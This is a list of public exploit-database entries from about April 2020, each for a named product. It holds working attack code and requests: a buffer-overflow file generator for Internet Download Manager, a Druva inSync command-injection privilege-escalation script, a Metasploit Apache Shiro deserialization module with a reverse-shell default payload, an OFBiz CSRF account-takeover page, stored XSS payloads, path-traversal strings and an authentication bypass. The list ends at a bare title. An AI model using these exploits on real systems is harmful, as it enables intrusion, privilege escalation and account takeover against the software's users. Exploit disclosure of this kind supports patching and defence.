# Title: Internet Download Manager 6.37.11.1 - Stack Buffer Overflow (PoC) # Author: Vulnerability Laboratory # Date: 2020-04-28 # Vendor: https://www.internetdownloadmanager.com # Software: https://www.internetdownloadmanager.com/download.html # CVE: N/A Document Title: =============== Internet Download Manager v6.37.11.1 - Stack Buffer Overflow Vulnerabilities References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2236 Common Vulnerability Scoring System: ==================================== 7.1 Vulnerability Disclosure Timeline: ================================== 2020-04-28: Public Disclosure (Vulnerability Laboratory) (Copy of the Homepage: https://www.internetdownloadmanager.com/support/about_us.html ) (Software Product: https://www.internetdownloadmanager.com/download.html) Exploitation Technique: ======================= Local Severity Level: =============== High Technical Details & Description: ================================ Multiple stack buffer overflow vulnerabilities have been discovered in the official Internet Download Manager v6.37.11.1 software. The buffer overflows allow overwriting registers of the process to compromise the file system by elevating local process privileges. 1.1 The first stack buffer overflow is located in the `search` function of the downloads menu. The search function itself does not apply any secure restriction to the requested search input variable. Local attackers with access to the software are able to overflow the registers to elevate local process privileges. This allows a local attacker to compromise the local computer or file system. 1.2 The second stack buffer overflow is located in the `Export/Import` function of the tasks menu. Local users are able to import and export the download tasks as *.ef2 files. Local attackers are able to import manipulated *.ef2 files with manipulated Referer and source URL values to overwrite the EIP register. 
The issue occurs because the ef2 filetype (content) validation process is insufficient and does not enforce any length restrictions. The security risk of the local stack buffer overflow vulnerabilities in the software is estimated as high with a CVSS score of 7.1. Exploitation of the buffer overflow vulnerability requires a low-privilege or restricted system user account and no user interaction. Successful exploitation of the vulnerability results in an overwrite of the active registers and compromise of the computer system or process. Vulnerable Module(s): [+] Search [+] Import/Export (ef2) Proof of Concept (PoC): ======================= 1.1 The stack buffer overflow vulnerability can be exploited by local attackers with system user privileges without user interaction. For security demonstration or to reproduce the local vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Open the software 2. Click the downloads menu and open the search 3. Inject a large unicode payload inside the search input field and transmit 4. The software crashes with several uncaught exceptions because of an overwritten register (0168D8F0) 5. The local buffer overflow vulnerability is successfully reproduced! --- Debug Logs (0168D8F0) --- 00d61850 668b08 mov cx,word ptr [eax] ds:002b:41414141 - 00D6186D |. 56 PUSH ESI ; /Arg1 - 00D61882 |. E8 59FFFFFF CALL IDMan.00D617E0 ; IDMan.00D617E0 - 00D6189B |> 50 PUSH EAX ; /Arg1 - 00D6189E |. E8 3DFFFFFF CALL IDMan.00D617E0 ; IDMan.00D617E0 - Call stack Address=0168C79C Stack=00DFE0F2 Procedure / arguments=IDMan.00D617E0 Called from=IDMan.00DFE0ED Frame=0168E02C - SEH chain Address SE handler 0168C790 IDMan.00F751E8 0168D8F0 41414141 - EAX 41414141 ECX 01680000 EDX 41414141 EBX 00000001 ESP 0168C76C EBP 0168E02C UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..." ESI 0168C7AC UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..." 
EDI 00410043 EIP 00D61850 IDMan.00D61850 Executable modules Base=00D60000 Size=00539000 (5476352.) Entry=00F5CB1C IDMan.<ModuleEntryPoint> Name=IDMan File version=6, 37, 11, 2 Path=C:Program Files (x86)Internet Download ManagerIDMan.exe 1.2 The stack buffer overflow vulnerability can be exploited by local attackers with system user privileges without user interaction. For security demonstration or to reproduce the local vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Open the software 2. Start the bof_poc.pl 3. Open the tasks menu 4. Click import and import *.ef2 poc Note: The software process crashs on import with uncaught exception 5. Successful reproduce of the local buffer overflow vulnerability! Usage Example: Export/Import (*.ef2) < https://www.vulnerability-lab.com/download_content.php?id=1337 referer: https://www.vulnerability-lab.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko > PoC: Exploit #!/usr/bin/perl # Local Stack Buffer Overflow Exploit for Internet Download Manager v6.37.11.1 # Vulnerability Laboratory - Benjamin Kunz Mejri my $poc = "bof_poc.ef2" ; print "[+] Producing bof_poc.ef2 ..." ; my $buff0=" "."<" x 1; my $buff1=" n https://"."A" x 1024; my $buff2=" n Referer:"."A" x 1024; my $buff3=" n User Agent:"."A" x 1024; my $buff4=" n ".">" x 1; open(ef2, ">>$poc") or die "Cannot open $poc"; print ef2 $buff0; print ef2 $buff1; print ef2 $buff2; print ef2 $buff3; print ef2 $buff4; close(ef2); print "n[+] done !"; Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. -- VULNERABILITY LABORATORY - RESEARCH TEAM
-
EmEditor 19.8 - Insecure File Permissions
# Exploit Title: EmEditor 19.8 - Insecure File Permissions # Date: 2020-04-27 # Exploit Author: SajjadBnd # Vendor Homepage: https://www.emeditor.com/ # Software Link: https://support.emeditor.com/en/downloads/suggested # Version: 19.8 # Tested on: Win10 Professional x64 [ Description ] EmEditor is a fast, lightweight, yet extensible, easy-to-use text editor for Windows. Both native 64-bit and 32-bit builds are available, and moreover, the 64-bit includes separate builds for SSE2 (128-bit), AVX-2 (256-bit), and AVX-512 (512-bit) instruction sets. [ PoC ] C:\Users\user\AppData\Local\Programs\EmEditor λ icacls *.exe ee128.exe NT AUTHORITY\SYSTEM:(F) BUILTIN\Administrators:(F) DESKTOP-K4UDI4I\user:(F) ee256.exe NT AUTHORITY\SYSTEM:(F) BUILTIN\Administrators:(F) DESKTOP-K4UDI4I\user:(F) ee512.exe NT AUTHORITY\SYSTEM:(F) BUILTIN\Administrators:(F) DESKTOP-K4UDI4I\user:(F) EEAdmin.exe NT AUTHORITY\SYSTEM:(F) BUILTIN\Administrators:(F) DESKTOP-K4UDI4I\user:(F) eehlpver.exe NT AUTHORITY\SYSTEM:(F) BUILTIN\Administrators:(F) DESKTOP-K4UDI4I\user:(F) eeupdate.exe NT AUTHORITY\SYSTEM:(F) BUILTIN\Administrators:(F) DESKTOP-K4UDI4I\user:(F) emedhtml.exe NT AUTHORITY\SYSTEM:(F) BUILTIN\Administrators:(F) DESKTOP-K4UDI4I\user:(F) EmEditor.exe NT AUTHORITY\SYSTEM:(F) BUILTIN\Administrators:(F) DESKTOP-K4UDI4I\user:(F) emedtray.exe NT AUTHORITY\SYSTEM:(F) BUILTIN\Administrators:(F) DESKTOP-K4UDI4I\user:(F) emedws.exe NT AUTHORITY\SYSTEM:(F) BUILTIN\Administrators:(F) DESKTOP-K4UDI4I\user:(F) Successfully processed 10 files; Failed processing 0 files [ Exploit - Privilege Escalation ] Replace any *.exe files with any executable malicious file you want then wait and get SYSTEM or Administrator rights (Privilege Escalation) - Also you can use DLL Hijacking technique(emonig.dll,emregexp.dll,emtoast.dll..) ;D
-
hits script 1.0 - 'item_name' SQL Injection
# Exploit Title: hits script 1.0 - 'item_name' SQL Injection # Date: 2020-04-27 # Exploit Author: SajjadBnd # Vendor Homepage: https://hits.ir # Software Link: http://dl.persianscript.ir/script/hitsir-script-persian%28PersianScript.ir%29.zip # Software Link(mirror): http://dl.nuller.ir/hitsir-script-persian[www.nuller.ir].zip # Version: 1.0 # Tested on: Win10 Professional x64 [ description of script ] With this script you can set up a site to exchange statistics and traffic as well as increase rankings. In this script, it is possible to exchange Google +1, exchange Facebook points, exchange Twitter followers, exchange YouTube visitors, exchange visit statistics. [ poc ] file : ipn.php parameters : 'item_name' , 'item_number' method : POST source [ 36: mysql_query $pack = mysql_fetch_object(mysql_query("SELECT * FROM `c_pack` WHERE `name`='{$item_name}' AND `coins`='{$item_number}'")); 19: $item_name = $_POST['item_name']; 20: $item_number = $_POST['item_number']; requires: 4: if(!(mysql_connect("$host", "$user", "$pass") && mysql_select_db("$tablename"))) 31: if(!$fp) else 35: if(strcmp($res, "VERIFIED") == 0) ] parameter : 'custom' method : POST source [ 43: mysql_query mysql_query("UPDATE `users` SET `coins`=`coins`+'{$pack->coins}' WHERE `id`='{$custom}'"); 27: $custom = $_POST['custom']; requires: 4: if(!(mysql_connect("$host", "$user", "$pass") && mysql_select_db("$tablename"))) 31: if(!$fp) else 35: if(strcmp($res, "VERIFIED") == 0) 41: if(($receiver_email == $site->paypal) && ($payment_amount == $pack->price) && ($payment_status == 'Completed')) ] parameters : 'item_name','mc_gross' method : POST source [ 44: mysql_query mysql_query("INSERT INTO `transactions` (user, points, pack, money, date) VALUES('{$user->login}', '{$pack->coins}', '{$item_name}', '{$payment_amount}', NOW())"); 19: $item_name = $_POST['item_name']; 22: $payment_amount = $_POST['mc_gross']; requires: 4: if(!(mysql_connect("$host", "$user", "$pass") && mysql_select_db("$tablename"))) 31: 
if(!$fp) else 35: if(strcmp($res, "VERIFIED") == 0) 41: if(($receiver_email == $site->paypal) && ($payment_amount == $pack->price) && ($payment_status == 'Completed')) ] file : register.php parameters : 'PlusREF','register' method : COOKIE,POST source [ 22: mysql_query $user1 = mysql_query("SELECT * FROM `users` WHERE `id`='{$ref}'"); 21: $ref = $_COOKIE['PlusREF']; requires: 3: if(isset($_POST['register'])) 19: if(!checkpwd ($sec['password'], $sec['password2'])) else 20: if(isset($_COOKIE['PlusREF'])) ] & source [ 40: mysql_query mysql_query("INSERT INTO `users`(email,login,IP,pass,passdecoded,ref,signup,activate) values('{$sec['email']}','{$sec['user']}','$final','$passc','$passa','{$ref}',NOW(),'{$activare}')") or 37: $final = visitorip (); 39: $passc = md5($passa); 38: $passa = $sec['password']; 38: $passa = $sec['password']; 21: $ref = $_COOKIE['PlusREF']; // if(isset($_COOKIE)), 26: $activare = rand(000000000, 999999909); requires: 3: if(isset($_POST['register'])) 19: if(!checkpwd ($sec['password'], $sec['password2'])) else ]
-
Druva inSync Windows Client 6.5.2 - Local Privilege Escalation
# Exploit Title: Druva inSync Windows Client 6.5.2 - Local Privilege Escalation # Date: 2020-04-28 # Exploit Author: Chris Lyne # Vendor Homepage: druva.com # Software Link: https://downloads.druva.com/downloads/inSync/Windows/6.5.2/inSync6.5.2r99097.msi # Version: 6.5.2 # Tested on: Windows 10 # CVE : CVE-2019-3999 # See also: https://www.tenable.com/security/research/tra-2020-12 import socket import struct import sys # Command injection in inSyncCPHwnet64 RPC service # Runs as nt authority\system. so we have a local privilege escalation if len(sys.argv) < 2: print "Usage: " + __file__ + " <quoted command to execute>" print "E.g. " + __file__ + " \"net user /add tenable\"" sys.exit(0) ip = '127.0.0.1' port = 6064 command_line = sys.argv[1] # command gets passed to CreateProcessW def make_wide(str): new_str = '' for c in str: new_str += c new_str += '\x00' return new_str hello = "inSync PHC RPCW[v0002]" func_num = "\x05\x00\x00\x00" # 05 is to run a command command_line = make_wide(command_line) command_length = struct.pack('<i', len(command_line)) # send each request separately requests = [ hello, func_num, command_length, command_line ] sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((ip, port)) i = 1 for req in requests: print 'Sending request' + str(i) sock.send(req) i += 1 sock.close() print "Done."
-
ChemInv 1.0 - Authenticated Persistent Cross-Site Scripting
# Exploit Title: ChemInv 1.0 - Authenticated Persistent Cross-Site Scripting # Exploit Author: Bobby Cooke # Date: 2020-04-29 # Software Link: https://github.com/tmorrell/cheminv # Software Info: # "Cheminv is a web-based chemical inventory system. This responsive database provides an accessible way to organize and order chemicals, and is provided as an open-source package for all non-commercial users." # "Cheminv was created by Thomas Morrell for the Haw Yang Lab at Princeton University" # "Cheminv is based on ecDB www.ecDB.net, which was created by Nils Fredriksson aka. ElectricMan and designed by Buildlog." # Version: 1 # Tested On: CentOS # Vulnerability Type: # ChemInv suffers from a persistent cross-site scripting (XSS) vulnerability. This vulnerability can be exploited to make all users of the system with read access to the project execute malicious client-side code every time a user views the 'Projects' or 'Add Chemicals' tab. # The application's source code mitigates SQL injection (SQLi), but fails to sanitize HTML and JavaScript before the value is stored in the SQL database and later rendered; escaping a value for SQL does not encode it for HTML output. 
# Vulnerable Source Code ## proj_list.php 33 include('include/include_proj_add.php'); 34 $AddProj = new ProjAdd; 35 $AddProj->AddProj(); 36 37 $proj_query = mysql_query("SELECT * FROM projects WHERE project_owner= $owner"); ## include/include_proj_add.php 2 class ProjAdd { 3 public function AddProj () { 4 5 require_once('include/login/auth.php'); 6 include('include/mysql_connect.php'); 7 8 if(isset($_POST['submit'])) { 9 $owner = $_SESSION['SESS_MEMBER_ID']; 10 $name = mysql_real_escape_string($_POST['name']); 11 12 if ($name == '') { 13 echo '<div class="message red">'; 14 echo 'You have to specify a name!'; 15 echo '</div>'; 16 } 17 else { 18 $sql="INSERT into projects (project_owner, project_name) VALUES ('$owner', '$name')"; 19 $sql_exec = mysql_query($sql); # Malicious POST Request to https://TARGET/proj_list.php POST /proj_list.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://TARGET/proj_list.php Content-Type: application/x-www-form-urlencoded Content-Length: 16 Connection: close Cookie: PHPSESSID=7af5kg3to8fstfum0to1ukpb85 name=evilProject<script>alert('XSS');</script>&submit=
-
VirtualTablet Server 3.0.2 - Denial of Service (PoC)
# Title: VirtualTablet Server 3.0.2 - Denial of Service (PoC) # Author: Dolev Farhi # Date: 2020-04-29 # Vulnerable version: 3.0.2 (14) # Link: http://www.sunnysidesoft.com/ # CVE: N/A from thrift import Thrift from thrift.transport import TSocket from thrift.transport import TTransport from thrift.protocol import TBinaryProtocol from pygen.example import Example host = '192.168.1.1' port = 57110 try: transport = TSocket.TSocket(host, port) transport = TTransport.TBufferedTransport(transport) protocol = TBinaryProtocol.TBinaryProtocol(transport) client = Example.Client(protocol) transport.open() client.send_say('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA') transport.close() except Thrift.TException as tx: print(tx.message)
-
Online Scheduling System 1.0 - Persistent Cross-Site Scripting
# Exploit Title: Online Scheduling System 1.0 - Persistent Cross-Site Scripting # Exploit Author: Bobby Cooke # Date: 2020-04-30 # Vendor Homepage: https://www.sourcecodester.com/php/14168/online-scheduling-system.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-scheduling-system.zip # Version: 1.0 # Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4 # Vulnerability Info: # Online Scheduling System v1.0 suffers from an authenticated persistent cross-site scripting vulnerability. This Proof of Concept (PoC) will cause all users of the system, with read access to the courses, to execute arbitrary client-side code when viewing the 'Home' and 'List' tabs within the web application. The application fails to sanitize arguments supplied by the user before inserting them into the SQL database. # Vulnerable Source Code ## /add.cor.php 14 $Course_Code = $_POST['corcode']; 15 $Course_name = $_POST['corname']; 16 17 $sql = "INSERT INTO course (Course_Code, Course_name) VALUES ('$Course_Code', '$Course_name')"; # Malicious POST Request POST /Online%20Scheduling%20System/add.cor.php HTTP/1.1 Host: 172.16.65.130 Referer: http://172.16.65.130/Online%20Scheduling%20System/addcourse.php Content-Type: application/x-www-form-urlencoded Connection: close Cookie: PHPSESSID=8o12pka3gvais768f43v5q4d60 corcode=XSS-101&corname=%3Cscript%3Ealert%28%22XSS-101%22%29%3B%3C%2Fscript%3E&submit=
-
php-fusion 9.03.50 - Persistent Cross-Site Scripting
# Exploit Title: php-fusion 9.03.50 - Persistent Cross-Site Scripting # Google Dork: "php-fusion" # Date: 2020-04-30 # Exploit Author: SunCSR (Sun* Cyber Security Research) # Vendor Homepage: https://www.php-fusion.co.uk/ # Software Link: https://www.php-fusion.co.uk/infusions/downloads/downloads.php?cat_id=30 # Version: 9.03.50 # Tested on: Windows # CVE : CVE-2020-12706 ### Vulnerability : Persistent Cross-Site Scripting ###Describe the bug Persistent Cross-site scripting (Stored XSS) vulnerabilities in PHP-Fusion 9.03.50 allow remote attackers to inject arbitrary web script or HTML via the go parameter to /infusions/faq/faq_admin.php, /infusions/shoutbox_panel/shoutbox_admin.php ###To Reproduce Steps to reproduce the behavior: Authenticated user submit Q&A or Shoutbox to admin ### POC: ## Submit Q&A: POST /php-fusion/submit.php?stype=q HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------68756068726681644952075211938 Content-Length: 1146 Origin: http://TARGET DNT: 1 Connection: close Referer: http://TARGET/php-fusion/submit.php?stype=q Cookie: xxx Upgrade-Insecure-Requests: 1 -----------------------------68756068726681644952075211938 Content-Disposition: form-data; name="fusion_token" 2-1588232750-f839ed0754d5dc8aa577cfb660e273e711ec03a9a782de90ac34860cdb45a8f1 -----------------------------68756068726681644952075211938 Content-Disposition: form-data; name="form_id" submit_form -----------------------------68756068726681644952075211938 Content-Disposition: form-data; name="fusion_PR57qY" -----------------------------68756068726681644952075211938 Content-Disposition: form-data; name="faq_question" Question XSS -----------------------------68756068726681644952075211938 
Content-Disposition: form-data; name="faq_answer" xss</textarea><ScRiPt>alert('XSS')</ScRiPt> -----------------------------68756068726681644952075211938 Content-Disposition: form-data; name="faq_cat_id" 1 -----------------------------68756068726681644952075211938 Content-Disposition: form-data; name="faq_language[]" English -----------------------------68756068726681644952075211938 Content-Disposition: form-data; name="submit_link" Submit -----------------------------68756068726681644952075211938-- ## Shoutbox POST /php-fusion/infusions/downloads/downloads.php?cat_id=1 HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 272 Origin: http://TARGET DNT: 1 Connection: close Referer: http://TARGET/php-fusion/infusions/downloads/downloads.php?cat_id=1 Cookie: xxx Upgrade-Insecure-Requests: 1 fusion_token=2-1588233429-3df5ba2b9c690e833548645f66a7772cf7fdb24ca9be130d5ff01e26351a2771&form_id=sbpanel&fusion_gEHiPs=&shout_id=0 &shout_hidden=&shout_message=xss</textarea><ScRiPt>alert('XSS')</ScRiPt>&shout_language=English&shout_box=Save+Shout ###Reference: https://github.com/php-fusion/PHP-Fusion/issues/2306 ### History ============= 2020-04-09 Issue discovered 2020-04-14 Vendor contacted 2020-04-28 Vendor response and hotfix 2020-04-29 Vendor releases fixed
-
Super Backup 2.0.5 for iOS - Directory Traversal
# Title: Super Backup 2.0.5 for iOS - Directory Traversal # Author: Vulnerability Laboratory # Date: 2020-04-30 # Software: https://apps.apple.com/us/app/super-backup-export-import/id1052684097 # CVE: N/A Document Title: =============== Super Backup v2.0.5 iOS - Directory Traversal Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2200 Common Vulnerability Scoring System: ==================================== 7.1 Product & Service Introduction: =============================== Backup all your iPhone or iPad contacts in 1 tap and export them. Fastest way to restore contacts from PC or Mac. Export by mailing the backed up contacts file to yourself. Export contacts file to any other app on your device. Export all contacts directly to your PC / Mac over Wifi, no software needed! Restore any contacts directly from PC / Mac. Restore contacts via mail. Get the ultimate contacts backup app now. (Copy of the Homepage: https://apps.apple.com/us/app/super-backup-export-import/id1052684097 ) Affected Product(s): ==================== Dropouts Technologies LLP Product: Super Backup v2.0.5 Vulnerability Disclosure Timeline: ================================== 2020-04-30: Public Disclosure (Vulnerability Laboratory) Technical Details & Description: ================================ A directory traversal web vulnerability has been discovered in the official Super Backup v2.0.5 ios mobile web-application. The vulnerability allows remote attackers to change the application path in performed requests to compromise the local application or file-system of a mobile device. Attackers are for example able to request environment variables or a sensitive system path. The directory-traversal web vulnerability in the app is located in the `list` and `download` module with the `path` parameter. Attackers are able to change the path variable to request the local list command. 
By changing the path parameter the validation mechanism runs into a logic error that turns back the possibility to request different pathes outside the basic import/export folder. Thus way the attacker injects for example local path environment varibales to compromise the local ios web-application. Exploitation of the directory traversal web vulnerability requires no privileged web-application user account or user interaction. Successful exploitation of the vulnerability results in information leaking by unauthorized file access and mobile application compromise. Proof of Concept (PoC): ======================= The directory traversal vulnerability can be exploited by attackers with access to the wifi interface in a local network without user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. PoC: Payloads %2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F%00 /../../../../../../../../../../../../../../../../../../../../../../%00 //.././%00 PoC: Exploitation http://localhost/list?path=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F%00 http://localhost/download?path=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F%00 --- PoC Session Logs [GET]] --- http://localhost/list?path=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F%00 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive - GET: HTTP/1.1 200 OK Content-Length: 174 Content-Type: application/json Connection: Close - http://localhost/download?path=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F%00 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Connection: keep-alive - GET: HTTP/1.1 200 OK 
Content-Length: 174 Content-Type: application/json Connection: Close - Opening the URL allows downloading the list JSON file, whose content shows the path output [{"path":"../../../../../../../../../../../../ "size":21961}] References: http://localhost/list?path= http://localhost/download?path= Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab -- VULNERABILITY LABORATORY - RESEARCH TEAM
-
HardDrive 2.1 for iOS - Arbitrary File Upload
# Title: HardDrive 2.1 for iOS - Arbitrary File Upload # Author: Vulnerability Laboratory # Date: 2020-04-30 # Software: https://apps.apple.com/ch/app/harddrive/id383226784 # CVE: N/A Document Title: =============== HardDrive v2.1 iOS - Arbitrary File Upload Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2221 Common Vulnerability Scoring System: ==================================== 7.4 Product & Service Introduction: =============================== Store+Organize+Edit+Protect+Import+Download+View+Share your files right from your iPhone! Transform your iPhone/iPod touch into a real HardDrive with no extra cable or software. (Copy of the Homepage: https://apps.apple.com/ch/app/harddrive/id383226784 ) Affected Product(s): ==================== Sebastien BUET HardDrive v2.1 - Apple iOS Mobile Web Application Vulnerability Disclosure Timeline: ================================== 2020-04-29: Public Disclosure (Vulnerability Laboratory) Technical Details & Description: ================================ An arbitrary file upload web vulnerability has been discovered in the official Air Sender v1.0.2 iOS mobile application. The web vulnerability allows remote attackers to upload arbitrary files to compromise, for example, the file system of a service. The arbitrary upload vulnerability is located within the web-server configuration when using the upload module. Remote attackers are able to bypass the local web-server configuration by uploading malicious webshells. Attackers are able to inject their own files with malicious `filen` values in the `upload` POST method request to compromise the mobile web-application. The application does not perform checks for multiple file extensions. This allows an attacker, for example, to upload an html.js.png file. 
After the upload the attacker requests the original url source with the uploaded file and removes the unwanted extension to execute the code in the unprotected web-frontend. The security risk of the vulnerability is estimated as high with a common vulnerability scoring system count of 7.0. Exploitation of the web vulnerability requires a low privilege ftp application user account and no user interaction. Successful exploitation of the arbitrary file upload web vulnerability results in application or device compromise. Request Method(s): [+] POST Vulnerable Module(s): [+] ./upload Vulnerable File(s): [+] file Proof of Concept (PoC): ======================= The arbitrary file upload web vulnerability can be exploited by remote attackers without user interaction or privileged user accounts. For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue. PoC: Vulnerable Source (File Dir Listing Index) <tr><td width="100px" valign="middle" align="left"><img src="exploit.html"></td><td width="300px" valign="middle" align="left"> <a href="exploit.html.js">exploit.html.js</a></td> <td width="454px" valign="middle" align="left"> <em valign="middle" align="center">size: 256.7 Kb PoC: Exploitation http://localhost:50071/exploit.html.js --- PoC Session Logs [POST] --- (file) http://localhost:50071/ Host: localhost:50071 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------9331569428946906291010349387 Content-Length: 263181 Origin: http://localhost:50071 Connection: keep-alive Referer: http://localhost:50071/ file=exploit.html.js.png&button=Submit POST: HTTP/1.1 200 OK Accept-Ranges: bytes Content-Length: 381654 - http://localhost:50071/exploit.html.js Host: 
localhost:50071 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: image/webp,*/* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive - http://localhost:50071/exploit.html GET: HTTP/1.1 200 OK Accept-Ranges: bytes Content-Length: 366735 Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. -- VULNERABILITY LABORATORY - RESEARCH TEAM
-
Apache OFBiz 17.12.03 - Cross-Site Request Forgery (Account Takeover)
# Exploit Title: Apache OFBiz 17.12.03 - Cross-Site Request Forgery (Account Takeover) # Exploit Author: Faiz Ahmed Zaidi # Vendor Homepage: [https://ofbiz.apache.org/security.html] # Software Link: https://ofbiz.apache.org/download.html#security # Version: Before 17.12.03 # Tested on: Linux and Windows # CVE : CVE-2019-0235 #Exploit Code: <html> <body> <form action="https://hostipaddress:8443/partymgr/control/updateEmailAddress" method="POST"> <input type="hidden" name="contactMechId" value="admin" /> <input type="hidden" name="contactMechTypeId" value="EMAIL_ADDRESS" /> <input type="hidden" name="partyId" value="admin" /> <input type="hidden" name="DONE_PAGE" value="viewprofile?party_id=admin∂yId=admin" /> <input type="hidden" name="emailAddress" value="[email protected]" /> <input type="hidden" name="allowSolicitation" value="Y" /> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body> </html> After that do a password reset via forget password. It's done :)
-
Online Scheduling System 1.0 - Authentication Bypass
# Exploit Title: Online Scheduling System 1.0 - Authentication Bypass # Exploit Author: Bobby Cooke # Date: 2020-04-30 # Vendor Homepage: https://www.sourcecodester.com/php/14168/online-scheduling-system.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-scheduling-system.zip # Version: 1.0 # Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4 # Malicious POST Request to https://TARGET/Online%20Scheduling%20System/login.php HTTP/1.1 POST /Online%20Scheduling%20System/login.php HTTP/1.1 Host: TARGET Connection: close Cookie: PHPSESSID=8o12pka3gvais768f43v5q4d60 username=0&password=0&lgn=Login
-
Apache Shiro 1.2.4 - Cookie RememberME Deserial RCE (Metasploit)
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Powershell def initialize(info={}) super(update_info(info, 'Name' => 'Apache Shiro v1.2.4 Cookie RememberME Deserial RCE', 'Description' => %q{ This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apache Shiro v1.2.4. }, 'License' => MSF_LICENSE, 'Author' => [ 'L / l-codes[at]qq.com' # Metasploit module ], 'References' => [ ['CVE', '2016-4437'], ['URL', 'https://github.com/Medicean/VulApps/tree/master/s/shiro/1'] ], 'Platform' => %w{ win unix }, 'Arch' => [ ARCH_CMD ], 'Targets' => [ [ 'Unix Command payload', 'Arch' => ARCH_CMD, 'Platform' => 'unix', 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_bash'} ], [ 'Windows Command payload', 'Arch' => ARCH_CMD, 'Platform' => 'win' ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jun 7 2016', 'Privileged' => false, 'DefaultOptions' => { 'WfsDelay' => 5 } ) ) register_options( [ OptString.new('TARGETURI', [ true, 'Base directory path', '/']) ]) end def aes_encrypt(payload) aes = OpenSSL::Cipher.new('aes-128-cbc') aes.encrypt aes.key = Rex::Text.decode_base64('kPH+bIxk5D2deZiIxcaaaA==') aes.random_iv + aes.update(payload) + aes.final end def exploit cmd = payload.encoded vprint_status("Execute CMD: #{cmd}") type = ( target.name == 'Unix Command payload' ? 'bash' : 'cmd' ) java_payload = ::Msf::Util::JavaDeserialization.ysoserial_payload('CommonsCollections2', cmd, modified_type: type) ciphertext = aes_encrypt(java_payload) base64_ciphertext = Rex::Text.encode_base64(ciphertext) send_request_cgi({ 'uri' => target_uri.path, 'method' => 'GET', 'cookie' => "rememberMe=#{base64_ciphertext}" }) end end
-
BoltWire 6.03 - Local File Inclusion
